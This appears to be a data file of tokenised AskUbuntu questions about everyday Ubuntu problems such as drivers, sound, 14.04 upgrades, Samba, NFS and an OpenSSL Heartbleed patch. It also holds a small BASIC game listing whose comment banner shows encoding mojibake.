449094	poor video quality 12.04	using both a dell 17 '' monitor and a hp 1740 i get bad video quality with a ubuntu 12.04 machine . i tried all of the resolution settings with the monitors , but the fonts are multi-colored and smaller fonts are illegible . the computer is a dual boot , and the screen looks great ( with either monitor ) in windows xp . i accessed display in systems settings and tried all it had to offer . please advise . gb
449097	is it possible to see a remote ubuntu server throught a gui ?	i have some ubuntu ( version 13.10 ) servers which i can access throught ssh . it is all fine , but i 'd like to access them with a gui , so to handle some operations more efficiently . of course i 'd like to not install any desktop environment on the server itself , i 'd just like a way to see what there is on that server with a gui on client side ... do n't know if i explained myself well . would it be possible ? i am currently using kubuntu 13.10 .
449100	switching to nvidia graphics ( nvidia prime , nvidia x server settings )	i recently installed ubuntu 14.04 and i tried to switch to my nvidia graphic card via nvidia x server settings , but it does n't allow me . it shows the blocking sign . any ideas ? -- with nvidia 745m
449102	ubuntu 12.04 , loading i801 i2c driver	i have a device connected to the following bus ( i will discuss it once i explain what i 'm trying to achieve ) , and i 'm trying to debug the driver itself ( generally it was working for earlier specifications and ubuntu versions and i 'm trying to update the driver to work on the newest specification , in order to do that i must get it working on a newer version of ubuntu and once i have the infrastructure i will start developing ) - i am trying to load the i2c bus driver i801 to no success . there are no /dev/i2c-x available , i tried to compile it as a built in as well as a module - none seem to make it available , maybe it should n't be there ? i do see `` something '' , which is /sys/modules/i2c_i801/drivers/pci : i801_smbus . the motherboard i use is intel 's db75en . when i check the bus with scope i can see once in a few seconds an access to device in 44h . i 'm using torvalds latest kernel ( 3.14 ) . any advice as to how do i load the driver and how does the bus drivers are selected and load ? thank you !
449103	chromium 34 and later can not detect flash plugin	i 've deleted ~/.macromedia and ~/.adobe contents and after a restart chromium ca n't detect flash plugin . it works just fine in firefox i have only chromoting viewer on chrome : //plugins/ chromium-browser 34.0.1847.116-0ubuntu2 adobe-flashplugin 11.2.202.350-0trusty1 i have profile-sync-daemon active ( tried stopping it , of course ) and broken policykit as in networkmanager broken after upgrade to kubuntu saucy does the detection depend on policykit ? what else can i do ?
449104	empathy wo n't connect to my facebook account	when i try to connect empathy to my facebook account , the following error appears : rough translation : `` error connecting to the app . sorry , but the app you are trying to access does n't exist or was deactivated . '' what can i do to solve it ?
449107	ubuntu 13.10 no sound , no sound indicator , no output devices	good morning all ! i have been dual-booting windows 8.1 and ubuntu 13.10 for several months now . i have had no problems until this morning when i found it strange that i had no sound indicator . i thought a reboot would fix it , but to no avail . the sound did n't seem to work either , even though it was working just fine in windows . in addition , when i looked at my sound settings , there are absolutely no devices , not even the 'dummy ' one that others describe . so i thought that maybe there was something wrong with alsa , so i brought up the alsamixer . the only what showed up when i first brought it up . when i opted to select an alternate sound card , my options were : - ( default ) 0 hda ati hdmi 1 hd-audio generic it appears that 0 is the default , and it only has s/pdif as an option . but when i bring up 1 , it contains what i expected ; master , headphones , speaker , pcm , mic , mic boost , beep , auto-mute mode , internal mic boost , and loopback mixing . nothing seems out of place . i have been searching for hours on end today and it 's really made my day a nuisance . i have tried so many console commands and nothing helps . please help me ! by the way , i would love to put up screenshots to more easily explain , but i do n't have enough reputation , so sorry about that . edit : i just upgraded to 14.04 , and it 's fixed the volume indicator issue . i just went into the sound settings and unchecked , then rechecked the show sound volume in the menu bar option . however , i have to do this every time i reboot . otherwise , i noticed when i put the sound control applet in my cairo dock , when i mouse over it it 's labeled `` hda ati hdmi : -2147483648 % '' . it became clear then that it 's using the wrong sound card . so i followed the instructions here : http : //crunchbang.org/forums/viewtopic.php ? pid=114968 and the alsamixer now shows the correct sound card as default . however , it has n't changed the sound card my system is using and there is still no sound . i hope that helps a bit more .
449108	install ubuntu desktop variable from cd	how to install ubuntu desktop variations ( such as lubuntu-xubuntu ) from installation cd ?
449117	ubuntu 14.04 minimize , maximize , close on right	who can i have my minimize , maximize , close buttons back on right in 14.04 ? thank you in advance
449118	13.10 samba installed . can not find it	i have freshly installed 13.10 on a laptop , i have done the obligatory web searches to find out all the things i need to install to actually make it useful . one of those is to install samba , which i believe is necessary to put this laptop on a home network , and enable personal file sharing . i have tried installing samba from the software center , also via terminal with these commands : sudo apt-get install samba samba-common sudo apt-get install python-glade2 sudo apt-get install system-config-samba running the above commands yields a message saying it is already installed . if i look in software center , it shows samba as installed . i have also tried other variations of these from other websites , but the net result is that samba is installed . yet , i can not find any icon for samba in the applications list and personal file sharing gives the message that network sharing is not available because certain packages ( ie samba , right ? ) are not installed . i have also found the main menu icon and ticked every single possible box , so if there is anything installed , there should be an icon for it in applications . so , what is going wrong ? secondly , why in god 's name does ubuntu not simply install samba in the first place ? ? thanks .
449119	using ubuntu vm as a host of a commercial web application installed to a local network	we are planning to create a web-based commercial application . it also can be installed into a local network of our customers . to make the installation process easier we would deliver a virtual machine image ( vmware and/or virtualbox ) . it would be an ubuntu os and it would have the application ( and all prerequisites ) preinstalled . i.e . we will sell the application itself and we would use the ubuntu as a host only without any changes of the os . can i distribute this virtual machine to our customers without sharing the source codes ?
449120	forgot `` administrator 's name '	i still have the password but i no longer have the name i used to create the administrator 's account . as i 'm a novice in all this , i 'm not sure i can safely go root without royally messing things up . how can i retrieve the name step-by-step ? thank you .
449121	black screen after login	i switched to xubuntu from windows and things have been pretty smooth until i tried to connect another monitor to my laptop ( using vga ) . the screen suddenly went black , and since then , even with my external monitor disconnected , all i see is a black screen after i enter the login details . i can use the guest account to login without any problems . i looked around before posting and found the exact same problem and the solution there was to delete this file /.config/xfce4/xfconf/xfce-perchannel-xml/displays.xml , but unfortunately that file does n't seem to exist in my pc . please help me out ! thanks
449128	firefox not closed properly when loging out	i just installed ubuntu 14.04 beta2 and out of 25 tries either logging out , shutting down or restarting , my session did n't close firefox properly 23 times when exiting . the result is the firefox tabs recovery page that never happens if i take the time to close firefox manually beforehand . since it worked 2/25 times , it feels like a time problem where ubuntu does n't allow firefox 's process time to end ( ubuntu logs out in about 1-2s ) . i 've never even received the `` wait for firefox ? / shut down anyway ? '' dialogue box that i observed under 12.04 . so if i 'm correct , how do i make it so that it waits ? if not what is the issue and how do i solve the improper exiting ? i have no experience with managing profile or session config files and very little with bash ( i understand it but am lousy at coding it ) . so if you ca n't answer but have an good article on how does the profiles/sessions work in unix/linux/debian/ubuntu ( if the same ) and/or how to make changes to the login/logout events , i 'd be happy with that . edit : i made additional tests that further indicate it 's a matter of time wmctrl -c firefox ; sleep 0.5 ; sudo shutdown now -r works fine 100 % wmctrl -c firefox ; sleep 0.2 ; sudo shutdown now -r works fine 50 % wmctrl -c firefox ; sudo shutdown now -r works fine 10 % sudo shutdown now -r & wmctrl -c firefox never seems to work ... so as a workaround , how can i write wmctrl -c firefox ; sleep 0.5 in a file that resembles .profile or bash_logout but for session logout ?
449132	why use a named pipe instead of a file ?	i recently read about named pipes , and i could n't understand why they exist . i 've read somewhere that using a named pipe is less time-consuming than using a file . why is this so ? the named pipes also have to be stored in memory ( and maybe swapped , just like files ) . as far as i can see , they must get an i-node which must be referenced by the current directory , just like files . also , they can must be removed by the programmer , just like files . so where does the advantage come from ?
449134	nfs daemon stuck in 'd ' ( uninteruptable sleep ) state	i 've got some older machines ( nothing crazy , ~2006 era ) connecting to a common nfs share . all of the machines are running ubuntu server 12.04 lts . they 're doing a bunch of reads and writes , which will go fine at first . after an indeterminate amount of time ( sometimes a few hours , sometimes a few days ) , all of the computers will stop responding , their loads will go up , and the load on the server will go crazy high . if i look into it , all of the nfsd processes will have a state of 'd ' . if i kill the script that 's performing all of the copies , things will go back to normal quickly ( no need to reboot the machines ) . i 've tried manually setting wsize and rsize to 4096 to make sure that the size of the blocks was n't causing the hang ups on the older hardware , but that did n't seem to have any effect . here 's my fstab file : ... 192.168.0.254 : /home /home nfs4 _netdev , auto , rsize=4096 , wsize=4096 0 0 192.168.0.254 : /opt /opt nfs4 _netdev , auto , rsize=4096 , wsize=4096 0 0 any ideas ? thanks in advance .
449135	i had 2g of ram and i upgraded to 6g and it only sees 3g	i did some searching , and i have a processor that supports pae . it is red when i run cat /proc/cpuinfo | grep pae i do have the 64 bit server version installed , however , i 'm using a desktop . ( that is just how i roll . ) when i started the computer , the boot screen sees the total 6g , so i think my motherboard supports it . when i run free -m , i get a total of 3259 . also , i do n't have an onboard video card . i read somewhere that sometimes to goes to that card . uname -a # 33~precise1-ubuntu smp the time x86_64 x86_64 x86_64 gnu/linux let me know if you have any suggestions . i 'm new to linux and a bit lost . # dmidecode 2.11 smbios 2.5 present . handle 0x0005 , dmi type 5 , 24 bytes memory controller information error detecting method : 8-bit parity error correcting capabilities : none supported interleave : one-way interleave current interleave : one-way interleave maximum memory module size : 2048 mb maximum total memory size : 8192 mb supported speeds : other supported memory types : dimm memory module voltage : 5.0 v associated memory slots : 4 0x0006 0x0007 0x0008 0x0009 enabled error correcting capabilities : none handle 0x0006 , dmi type 6 , 12 bytes memory module information socket designation : dimm1 bank connections : 0 1 current speed : unknown type : dimm installed size : 1024 mb ( double-bank connection ) enabled size : 1024 mb ( double-bank connection ) error status : ok handle 0x0007 , dmi type 6 , 12 bytes memory module information socket designation : dimm2 bank connections : 2 3 current speed : unknown type : dimm installed size : 2048 mb ( double-bank connection ) enabled size : 2048 mb ( double-bank connection ) error status : ok handle 0x0008 , dmi type 6 , 12 bytes memory module information socket designation : dimm3 bank connections : 4 5 current speed : unknown type : dimm installed size : 1024 mb ( double-bank connection ) enabled size : 1024 mb ( double-bank connection ) error status : ok handle 0x0009 , dmi type 6 , 12 bytes memory module information socket designation : dimm4 bank connections : 6 7 current speed : unknown type : dimm installed size : 2048 mb ( double-bank connection ) enabled size : 2048 mb ( double-bank connection ) error status : ok handle 0x0024 , dmi type 16 , 15 bytes physical memory array location : system board or motherboard use : system memory error correction type : none **maximum capacity : 4 gb** error information handle : not provided number of devices : 4 handle 0x0025 , dmi type 17 , 27 bytes memory device array handle : 0x0024 error information handle : not provided total width : 64 bits data width : 64 bits size : 1024 mb form factor : dimm set : none locator : dimm1 bank locator : type : ddr2 type detail : synchronous speed : 667 mhz manufacturer : ce00000000000000 serial number : 79312833 asset tag : 020748 part number : m3 78t2953ez3-ce6 handle 0x0026 , dmi type 17 , 27 bytes memory device array handle : 0x0024 error information handle : not provided total width : 64 bits data width : 64 bits size : 2048 mb form factor : dimm set : none locator : dimm2 bank locator : type : ddr2 type detail : synchronous speed : 667 mhz manufacturer : 7fba000000000000 serial number : 00000000 asset tag : 000000 part number : handle 0x0027 , dmi type 17 , 27 bytes memory device array handle : 0x0024 error information handle : not provided total width : 64 bits data width : 64 bits size : 1024 mb form factor : dimm set : none locator : dimm3 bank locator : type : ddr2 type detail : synchronous speed : 667 mhz manufacturer : ce00000000000000 serial number : 7931280c asset tag : 020748 part number : m3 78t2953ez3-ce6 handle 0x0028 , dmi type 17 , 27 bytes memory device array handle : 0x0024 error information handle : not provided total width : 64 bits data width : 64 bits size : 2048 mb form factor : dimm set : none locator : dimm4 bank locator : type : ddr2 type detail : synchronous speed : 667 mhz manufacturer : 7fba000000000000 serial number : 00000000 asset tag : 000000 part number :
449136	trouble installing ircd-hybrid	i have installed ircd-hybrid and commented out the host line in /etc/ircd-hybrid/ircd.conf i have also allowed ports 6665-6669 in ufw and restarted ircd-hybrid this is the error i get when trying to connect in my client : * connecting to xx.xxx.xxx.xxx:6667 ( xx.xxx.xxx.xxx:6667 ) * connected . now logging in . garbage : irc chat notice auth : *** looking up your hostname ... garbage : irc chat notice auth : *** checking ident garbage : irc chat notice auth : *** could n't look up your hostname garbage : irc chat notice auth : *** no ident response garbage : irc chat cap * ls : multi-prefix * closing link : yy.y.yy.yy ( registration timed out )
449142	valid driver for nvidia gt 740m on ubuntu 12.04 ( x64 ) ?	has anyone successfully installed some valid driver for nvidia-gt740m on ubuntu 12.04 ( x64 ) ? ? ( and being more accurate , on laptop hp pavilion 15 ? ) my question is as result of the latest thing i found , which is explained at ( as self-answer ) : ubuntu 12.04 bumblebee vs nvidia geforce gt 740m you can see how the nvidia-331 driver do n't recognises my 740m , even though geforce.com informs that this driver supports 700m series . and moreover , i had no answer to my problem from geforce.com looking forward to hearing from you ,
449147	how to install radeon hd 8570d	i am using ubuntu 13 with amd processor with integrated graphics radeon hd 8570d . how do i install the driver for this integrated video ?
449150	understand format of the parameters in binary file	i have a binary file which in it there are some parameters stored as binary , for example : x , y , z , u , p1 , p2 , .. up to 12 parameters . i used `` ghex '' to show it , ghex shows some hexadecimal values but i can not understand the format of the file ( how these parameters have been saved ) . is there any way ( program , ... ) to understand how these parameters have been saved ?
449154	how to upgrade easily from 12.04 lts to 14.04 lts without losing data ?	my system spec is : os : ubuntu 12.04 lts os type : 64-bit disk : 488.3 gb there is no partition on my machine and i want to upgrade to 14.04 lts . but i 'm afraid to do this as i 've got data in it that i do not want to lose . what will be the correct way to upgrade without losing data ? just a note : i do not have an external hard disk where i can take the backup .
449155	`` not enough space '' - while there is a lot of space	i have my ubuntu on a usb stick with persistence . it has ~1550 mb of free space . i decided to install a game ( for windows , so i used wine to do it ) on another usb device that has 8 gb . i pointed installation to that device , but the installer showed me : `` not enough space ! required : 2000 mb , free space : 1550 mb '' . every storage device is located in \media\ folder , so i think that there might be the problem . but i do n't know how to bypass it .
449156	how do i install foldit.tar.gz ( specifically ) ?	note : this is not a duplicate question . it is specific to foldit.tar.gz and installing this game is done uniquely . there is an askubuntu page answering the question , `` how do i install a .tar.gz ( or .tar.bz2 ) file ? `` , but those instructions are for that generic file type . they do n't work with this particular game , and in this explanation i 've resolved that . also , i 'm an absolute beginner , running ubuntu 13.01 for only about 2 months now . i 'm only barely familiar with the console at this point . please bear with me . however , what i offer is the simplest and most concise solution to this problem you will find ( out of the first 50 or so google results that come up ) . 1- from your downloads folder right click the downloaded file `` foldit.tar.gz '' and select the option to extract it into any folder you choose . i picked /public/foldit in my home folder . 2- the next step is easiest done from the console . type in sudo apt-get install xclip which enables you to cut and paste within the game . ( it should run without this feature , if you do n't want it . ) then type this in to start it sudo xclip 3- next type in sudo apt-get install libglut3 which is a prerequisite not mentioned on the fold.it site nor in the readme file . ( i asked them to change that , but who knows . ) if that command did n't work , like it did n't for me , then go to this page to download the libglut3 package , ubuntu packages , which i was then able to install via the software center . there , you should be all set . 4- before you try to start the game , make sure you 're on-line so it can download all the updates and puzzles . the readme file says , `` to start the game , run foldit from this directory . '' so go into the folder where you put the original download extracted , and double click foldit . if it does n't work completely for any reason ( like it did n't for me ) , restart ubuntu , and try this step again . for me , foldit would n't load up some of the puzzles , but on my 3rd try , it worked perfectly and has ever since . do n't you love it when you wind up answering your own question ? thank you to everyone that showed and interest and/or helped me .
449158	ca n't close all programs and continue the upgrade	i have decided to upgrade to ubuntu 14.04 today as it is supposed to be the 1st official release date . i used the usual : sudo apt-get update sudo apt-get upgrade sudo apt-get autoremove sudo update-manager -d after which i selected to continue keeping the configuration files etc . etc . the last thing it asked was if i wanted to keep some obsolete programs at which i clicked `` keep '' . then told me to close all programs and continue . i used alt-tab to move to the windows i need to start closing but soon found there are no menus , and i ca n't use alt-tab to get back to the upgrade window , there is no unity ribbon so i guess i have no way of interacting with the pc thus al i can do is reboot and have a most likely corrupted computer .
449162	ubuntu 12.04.4 dual-boot menu missing	i shrinked my e : drive and made a free space , i choosed `` install ubuntu alongside windows 7 '' , it installed on the free space , installing finsished but i dont have the grub menu , but ubuntu is installed on this free space .
449163	how to xmodmap super_l+tab to alt+tab	i used xmodmap to use my super+l key as a ctrl key , but i 'd like to use super+l+tab as alt+tab , as i do n't like to switch in behaviour between my macbook and ubuntu desktop . is there any way of accomplishing this , either by xmodmap or another trick ? thanks in advance !
449164	upgrading kubuntu from 14.04 final beta to stable	i am using kubuntu 's final beta for 14.04 and was wondering if i will have to install 14.04 stable ( when released ) or will there be a simple upgrade , or maybe just a dist-upgrade ?
449166	no audio with avconv ( formery ffmep )	i can not get any program that uses avconv ( such as openshot , or vlc ) , to play any sound on videos ( or even mp3 ) . this is after trying to uninstall and reinstall libav-tools , and even after upgrading to ubuntu 13.10 . these video files will play fine ( with audio ) with movie player . this even effects videos that i upload to dropbox ( which must use avconv for the upload ) . they will then show up on other devices ( like my phone ) without audio . if i upload the same file from my other ubuntu computer , they work just fine . the majority of the files that i work with are mp4 with aac audio . i 'm pulling my hair out . i must have messed something up somewhere , but i do n't know where . i have fairly limited linux knowledge . any ideas ? is there a config file somewhere that turns audio off and on in avconv ? thanks .
449174	email icons missing from menu bar after upgrade to ubuntu 14.04	i have recently upgraded from 12.04 to 14.04 and the noticed the usual email icon ( little envelope icon ) which allowed me to run my evolution , chat and thunderbird applications is no longer available . is there a simple way of getting it back ?
449177	how do i install nvidia optimus in 14.04 ?	i 've read dozens of news headlines last week , indicating that 14.04 has build-in nvidia optimus support . how do i enable/install it ?
449184	how to upgrade openssl 1.0.1f on ubuntu server 14.04 ?	it looks like ubuntu server 14.04 just released today includes openssl v1.0.1f which is vulnerable to the heartbleed bug . i 've updated my packages ( apt-get update ) but that 's the latest version available . how to do i upgrade to 1.0.1g so i 'm not vulnerable ?
449185	touchpad scroll area not working since upgrade to ubuntu 14.04	since my upgrade to ubuntu 14.04 from 12.04 the vertical and horizontal scrolling using my touchpad does not work . my laptop is an hp pavilion dv6 .
449194	i 'm not getting ubuntu 14.04 lts upgrade option in my update manager	i 'm currently running ubuntu 12.04.4 i 've tried sudo apt-get update sudo apt-get distribution upgrade do-release-upgrade all i get is to upgrade to a development release of 14.04 which i do n't want . i want to upgrade to the distribution release .
449197	missing libriaries for a gui .bas test and how does one get them ? ld : can not find -lx11 , -lxext , -lxpm , -lxrandr , -lxrender	i was testing out freebasic compilier for its ability to make interactive software ( in this case , a simple game called asteroids . ) the .bas code for it is right below : ' ãœã›ã›ã›ã›ãœ ãœã›ã›ã›ã›ã›ã›ãœ ã›ã›ã›ã›ã›ã›ã›ã› ã›ã›ã›ã›ã›ã›ã›ã›ã› ã›ã›ã›ã›ã›ã›ãœ ãœã›ã›ã›ã›ã›ãœ ã›ã› ã›ã›ã›ã›ã›ã›ãœ ãœã›ã›ã›ã›ã›ã›ãœ 'ã›ã› ã›ã› ã›ã›ãÿ ãÿãÿãÿ ã›ã› ã›ã› ã›ã› ãÿã›ã› ã›ã›ãÿ ãÿã›ã› ã›ã› ã›ã› ãÿã›ã› ã›ã›ãÿ ãÿãÿãÿ 'ã›ã› ã›ã› ãÿã›ã›ãœ ã›ã› ã›ã› ã›ã› ãœã›ã› ã›ã› ã›ã› ã›ã› ã›ã› ã›ã› ãÿã›ã›ãœ 'ã›ã›ã›ã›ã›ã›ã›ã› ãÿã›ã›ãœ ã›ã› ã›ã›ã›ã›ã›ã› ã›ã›ã›ã›ã›ã›ãÿ ã›ã› ã›ã› ã›ã› ã›ã› ã›ã› ãÿã›ã›ãœ 'ã›ã› ã›ã› ãÿã›ã›ãœ ã›ã› ã›ã› ã›ã› ã›ã› ã›ã› ã›ã› ã›ã› ã›ã› ã›ã› ãÿã›ã›ãœ 'ã›ã› ã›ã› ã›ã›ãœ ãœã›ã› ã›ã› ã›ã› ã›ã› ã›ã› ã›ã›ãœ ãœã›ã› ã›ã› ã›ã› ãœã›ã› ã›ã›ãœ ãœã›ã› 'ã›ã› ã›ã› ãÿã›ã›ã›ã›ãÿ ã›ã› ã›ã›ã›ã›ã›ã›ã›ã›ã› ã›ã› ã›ã› ãÿã›ã›ã›ã›ã›ãÿ ã›ã› ã›ã›ã›ã›ã›ã›ãÿ ãÿã›ã›ã›ã›ãÿ ' 'this is a one person game . the object is to shoot the falling asteroids and 'keep them from hitting the surface . use the left and right arrow keys to 'move your gun and the up key to fire . the `` p '' button pauses the game , and 'the `` q '' button ends it . when a game is paused , hit space to make it run 'again . scoring is based on the level you 're on . the higher the level , the 'more points for hit asteroids , and the less points taken away for missed 'asteroids . while you play , you may notice the screen flickering badly , or 'the action to fast . to correct this , make the number after flicker.control ' ( shown below ) bigger . if the game goes too slow , make the number smaller . flicker.control = 500 ' now press `` f5 '' to play. ' ' ' screen 7 '320 x 200 resolution randomize timer movement = 0 playagain : cls locate 12 , 1 color 15 input ; `` what level do you want to start at '' ; level locate 12 , 1 print `` `` gun = 165 missile.x = -5000 missile.y = 5000 totalhit = 0 misses = 0 totaldropped = 0 newasteroid : asteroid.x = 319 * rnd + 1 asteroid.y = 1 totaldropped = totaldropped + 1 a : color 0 while movement = 1 line ( gun2 - 20 , 170 ) - ( gun2 + 20 , 170 ) line ( gun2 , 155 ) - ( gun2 - 20 , 170 ) line ( gun2 , 155 ) - ( gun2 + 20 , 170 ) line ( gun2 - 3 , 147 ) - ( gun2 + 3 , 170 ) , , bf movement = 0 wend color 15 line ( gun - 20 , 170 ) - ( gun + 20 , 170 ) line ( gun , 155 ) - ( gun - 20 , 170 ) line ( gun , 155 ) - ( gun + 20 , 170 ) line ( gun - 3 , 147 ) - ( gun + 3 , 170 ) , , bf line ( asteroid.x - 10 , asteroid.y - 6 ) - ( asteroid.x + 10 , asteroid.y + 6 ) , 6 , bf circle ( missile.x , missile.y ) , 3 , 12 line ( 1 , 171 ) - ( 319 , 171 ) , 9 for count = 1 to flicker.control next count asteroid.x2 = asteroid.x asteroid.y2 = asteroid.y missile.x2 = missile.x missile.y2 = missile.y color 0 line ( asteroid.x2 - 10 , asteroid.y2 - 6 ) - ( asteroid.x2 + 10 , asteroid.y2 + 6 ) , 0 , bf circle ( missile.x2 , missile.y2 ) , 3 , 0 locate 23 , 1 color 9 print `` shot : '' ; totalhit locate 23 , 11 print `` level : '' ; level locate 23 , 21 print `` score : '' ; score missile.y = missile.y - 5 if missile.y < 1 then missile.y = 5000 end if asteroid.y = asteroid.y + level * .75 if asteroid.y > 170 then circle ( asteroid.x , asteroid.y ) , 30 , 14 circle ( asteroid.x , asteroid.y ) , 30 , 0 misses = misses + 1 if misses = 10 then goto gameover end if score = score - int ( 10 / level ) goto newasteroid end if if missile.x - 3 < asteroid.x + 10 and missile.x + 3 > asteroid.x - 10 and missile.y + 3 < asteroid.y + 6 then totalhit = totalhit + 1 if totalhit / 10 = int ( totalhit / 10 ) then level = level + 1 misses = 0 end if score = score + 10 * level for ctr = 1 to 7 radius = 15 * rnd + 5 offset.x = 40 * rnd - 20 offset.y = 40 * rnd - 20 circlecolor = 16 * rnd circle ( asteroid.x + offset.x , asteroid.y + offset.y ) , radius , circlecolor for ctr2 = 1 to 50 next ctr2 circle ( asteroid.x + offset.x , asteroid.y + offset.y ) , radius , 0 next ctr missile.y = 5000 goto newasteroid end if move $ = inkey $ select case move $ case chr $ ( 0 ) + `` k '' gun2 = gun gun = gun - 5 movement = 1 case chr $ ( 0 ) + `` m '' gun2 = gun gun = gun + 5 movement = 1 case chr $ ( 0 ) + `` h '' missile.x = gun missile.y = 147 case `` q '' goto quit case `` p '' color 15 line ( gun - 20 , 170 ) - ( gun + 20 , 170 ) line ( gun , 155 ) - ( gun - 20 , 170 ) line ( gun , 155 ) - ( gun + 20 , 170 ) line ( gun - 3 , 147 ) - ( gun + 3 , 170 ) , , bf line ( asteroid.x - 10 , asteroid.y - 6 ) - ( asteroid.x + 10 , asteroid.y + 6 ) , 6 , bf circle ( missile.x , missile.y ) , 3 , 12 locate 12 , 4 print `` game paused hit space to continue '' startpause : a $ = inkey $ select case a $ case `` `` locate 12 , 4 print `` `` goto endpause end select goto startpause end select endpause : goto a gameover : line ( 1 , 171 ) - ( 319 , 171 ) , 9 locate 23 , 1 color 9 print `` shot : '' ; totalhit locate 23 , 11 print `` level : '' ; level locate 23 , 21 print `` score : '' ; score color 15 line ( gun - 20 , 170 ) - ( gun + 20 , 170 ) line ( gun , 155 ) - ( gun - 20 , 170 ) line ( gun , 155 ) - ( gun + 20 , 170 ) line ( gun - 3 , 147 ) - ( gun + 3 , 170 ) , , bf color 4 locate 12 , 1 print `` e o '' locate 12 , 1 print `` me ov '' locate 12 , 1 print `` ame ove '' locate 12 , 1 print `` game over '' locate 12 , 1 print `` game over `` locate 12 , 1 print `` game over `` locate 12 , 1 print `` game over `` locate 12 , 1 print `` game over `` locate 12 , 1 print `` game over `` locate 12 , 1 print `` game over `` locate 12 , 1 print `` game over `` locate 12 , 1 print `` game over `` locate 12 , 1 print `` game over `` locate 12 , 1 print `` game over `` locate 12 , 1 print `` game over `` locate 12 , 1 print `` game over `` locate 12 , 1 print `` game over `` locate 12 , 1 print `` game over `` locate 12 , 1 print `` game over `` for ctr = 1 to 500 next ctr locate 13 , 13 print `` play again ? y/n '' playagain.y.n : y.n $ = inkey $ select case y.n $ case `` n '' goto quit case `` y '' goto playagain end select goto playagain.y.n quit : i used this command to compile the data into a usable application . $ /usr/local/bin/fbc -lang qb roids.bas what i got was an error , telling me that i am missing libraries to properly compile this code . ld : can not find -lx11 ld : can not find -lxext ld : can not find -lxpm ld : can not find -lxrandr ld : can not find -lxrender my question is how and where can i download these libraries in order to properly compile this code and create the small game ? thank in advance .
449199	intel assembly language from ubuntu	i just want to know if its possible to run assembly language programme , that i was running on windows os using tasm , on ubuntu ( linux environment ) . i actually removed windows completely from my laptop and currently running ubuntu.the problem here is that i have in my syllabus , assembly language programming in intel 8086 microprocessor . is there any way i can run those programs here in ubuntu ? can i make use of virtualbox . i do n't know what i 'm saying . please enlighten me , friends . thanks in advance : )
449201	`` not authenticated sources '' warning on apparently safe packages , ubuntu update manager	i 've been using ubuntu 12.04 for about 8 months . my machine was disconnected for a couple of weeks . am now connected , and update manager has 23 updates waiting . but i get a warning `` the action would require the installation of packages from not authenticated sources . '' i 've tried several , single updates , and so far all have this warning . e.g. , for just the ssl development libraries , header files and documentation , the `` details '' panel shows : libssl-dev i see that a very similar question at my update manager say `` requires installation of untrusted packages '' was answered in terms of terminal commands . what is happening here ? if i go the command-line route , must i abandon the update manager permanently ?
449202	disabling animations to speed up a system	my laptop is quite old and slow . i think disabling animations would speed the system , no ? chromium is especially slow .
449203	how to show old account on the greeter	tl ; dr -- > i want to know how to make an old account show up after reinstallation of ubuntu so that i can log in to that account and not have to reinstall all the other software i had installed on that account already . i installed kubuntu-desktop once my ubuntu installation was done . i became unhappy with it and so i un-installed it . to un-install it i re-logged in to the unity workspace stuff and removed all the kde packages . when i restarted my pc the ubuntu loading screen would show and then the screen would go blank , since i assumed that this means that the computer is not hung up and working i pressed alt-shift-f5 to open the shell . i could n't find a way to make the greeter show up . i checked whether or not it was installed , and it was installed . since i could n't find a solution to it i loaded the liveusb and reinstalled ubuntu . but this time i could n't use the already set up account ( abc ) again when it asked me to make an account , so i made a new account abc_new after installation the login screen came up just fine but i was expecting account abc to be part of the list of logginable accounts . but its not there . i want to know how to make it show up so that i do n't have to reinstall all the other software i had installed already ?
449204	do i need to enable trim if i have a non-intel/samsung	i read in one of the webupd8 articles that trim support , which was introduced in ubuntu 14.04 , by default only works for intel and samsung ssds . what about other ? i am using dell xps 13 dev edition laptop and the ssd is from a different manufacturer , so does trim work by default as well or i have to manually make a cron job file ?
449206	ubuntu 14.04 upgrade safe for dual boot ?	is it safe to upgrade ubuntu 13.10 to 14.04 if its setup on dual boot with windows ? i recently upgraded windows 8 to 8.1 with ubuntu 13.10 on dual boot and now the performance seems degraded and sluggish hence i 'm concerned about any further problems that may arise due to this upgrade .
449211	cdir= $ ( pwd ) gives `` permission denied ''	i have a very simple shell script , called deploy.sh # ! /bin/sh cdir= $ ( pwd ) echo hello world ! unfortunately , running it gives the following error : bird @ bird-laptop : ~/foo $ sh deploy.sh deploy.sh : 3 : deploy.sh : /home/bird/foo : permission denied hello world ! any clues , why this is happening ? bird @ bird-laptop : ~/foo $ ls -l total 156 -rwxrwxrwx 1 bird bird 327 april 18 00:57 deploy.sh -rw-r -- r -- 1 bird bird 327 april 18 00:53 deploy.sh~
449213	super key mapped as multikey on startup	after doing the configuration : sem @ sem-lifebook-e754 : ~ $ sudo dpkg-reconfigure keyboard-configuration [ sudo ] password for sem : your console font configuration will be updated the next time your system boots . if you want to update it now , run 'setupcon ' from a virtual console . update-initramfs : deferring update ( trigger activated ) processing triggers for initramfs-tools ( 0.103ubuntu4 ) ... update-initramfs : generating /boot/initrd.img-3.13.0-24-generic after this my super key works again . however , on reboot it goes back to the standard layout . the steps i took are : generic 104-key pc english ( us ) english ( us ) - english ( dvorak ) the default for the keyboard layout no compose key yes i 'm using ubuntu 14.04 x64 what i tried : every possibility with system settings > keyboard layout the /etc/default/keyboard file stays correct all the time , even on reboot . fixed it with an ugly hack . startup applications > add one with fill with xmodmap -e `` keycode 133 = super_l '' wish there was a better solution !
449217	replacing windows 8.1 with ubuntu 14.04	i have windows 8.1 on my hp pavilion g6 and would like to replace windows with ubuntu 14.04 but what option do i choose when it comes to the installation part ? i noticed it wont detect my windows 8.1 so should that matter if im going to replace it with ubuntu ? should i choose the erase disk option and then install ? secure boot and fastboot and all other options have been taken care of but would like some further instructions from someone a little more experienced .
